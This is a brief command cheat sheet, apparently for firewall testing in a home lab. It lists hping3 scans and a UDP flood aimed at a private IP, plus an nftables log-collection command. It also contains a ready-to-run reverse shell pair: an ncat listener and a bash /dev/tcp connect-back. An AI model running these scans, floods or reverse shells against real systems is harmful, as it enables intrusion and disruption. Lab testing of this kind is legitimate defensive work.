TCP SYN only
sudo hping3 -c 1 -S -p 443 192.168.0.16

TCP FIN only
sudo hping3 -c 1 -F -p 443 192.168.0.16

TCP PSH only
sudo hping3 -c 1 -P -p 443 192.168.0.16

TCP URG only
sudo hping3 -c 1 -U -p 443 192.168.0.16

TCP RST only
sudo hping3 -c 1 -R -p 443 192.168.0.16

TCP XMAS
sudo hping3 -c 1 -FPU -p 443 192.168.0.16

TCP FIN scan
sudo hping3 -F --scan 8000-9000 192.168.0.16

UDP flood
sudo hping3 -2 -c 1000 -i u1 -p 80 192.168.0.16

reverse shell attacker:
ncat -l 8080

reverse shell victim:
/bin/bash -i >& /dev/tcp/192.168.0.15/8080 0>&1

live logs:
sudo journalctl -k | grep "nftables" >> nftlogs
